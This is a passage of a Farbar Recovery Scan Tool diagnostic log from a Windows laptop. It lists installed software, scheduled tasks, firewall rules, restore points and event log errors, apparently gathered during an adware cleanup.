    Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
    Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
    Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
    Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
    Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
    Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
    Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
    Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
    Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
    PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
    Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
    Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
    Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
    The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
    TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
    Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
    UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version:  - UserTesting.com)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
    WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden
     
    ==================== Custom CLSID (Whitelisted): ==========================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
     
    ==================== Scheduled Tasks (Whitelisted) =============
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
    Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
    Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
    Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
    Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
    Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
    Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
    Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
    Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&amp;page=tsInstall
    Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
    Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
    Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
    Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
    Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
    Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
    Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
    Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
    Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
    Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)
     
    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
     
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
     
    ==================== Shortcuts =============================
     
    (The entries could be listed to be restored or removed.)
     
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
     
    ==================== Loaded Modules (Whitelisted) ==============
     
    2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
    2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
    2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
    2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
    2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
    2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
    2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ () C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-01-24 21:46 - 2017-01-24 21:46 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
    2016-12-09 16:55 - 2016-12-08 03:03 - 02412888 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
    2016-12-09 16:55 - 2016-12-08 03:03 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
     
    ==================== Alternate Data Streams (Whitelisted) =========
     
    (If an entry is included in the fixlist, only the ADS will be removed.)
     
    AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
     
    ==================== Safe Mode (Whitelisted) ===================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
     
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
     
    ==================== Association (Whitelisted) ===============
     
    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)
     
     
    ==================== Internet Explorer trusted/restricted ===============
     
    (If an entry is included in the fixlist, it will be removed from the registry.)
     
     
    ==================== Hosts content: ===============================
     
    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)
     
    2015-10-30 02:24 - 2017-02-01 17:10 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
     
     
    ==================== Other Areas ============================
     
    (Currently there is no automatic fix for this section.)
     
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
    DNS Servers: 192.168.1.1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.
     
    ==================== MSCONFIG/TASK MANAGER disabled items ==
     
     
    ==================== FirewallRules (Whitelisted) ===============
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    FirewallRules: [vm-monitoring-nb-session] => LPort=139
    FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
    FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
    FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
    FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
    FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
    FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
    FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
    FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
    FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
    FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
    FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
    FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
    FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
    FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
    FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
     
    ==================== Restore Points =========================
     
    15-01-2017 15:43:24 Installed TurboTax 2016 wrapper
    24-01-2017 15:52:44 Scheduled Checkpoint
    31-01-2017 20:53:13 end January 2017
    01-02-2017 17:15:49 JRT Pre-Junkware Removal
    01-02-2017 17:24:34 JRT Pre-Junkware Removal
     
    ==================== Faulty Device Manager Devices =============
     
     
    ==================== Event log errors: =========================
     
    Application errors:
    ==================
    Error: (02/01/2017 05:41:21 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
     
    Error: (02/01/2017 05:24:35 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
    Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
     
    Details:
    AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
     
    System Error:
    Access is denied.
    .
     
    Error: (02/01/2017 05:16:20 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
    Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
     
    Details:
    AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
     
    System Error:
    Access is denied.
    .
     
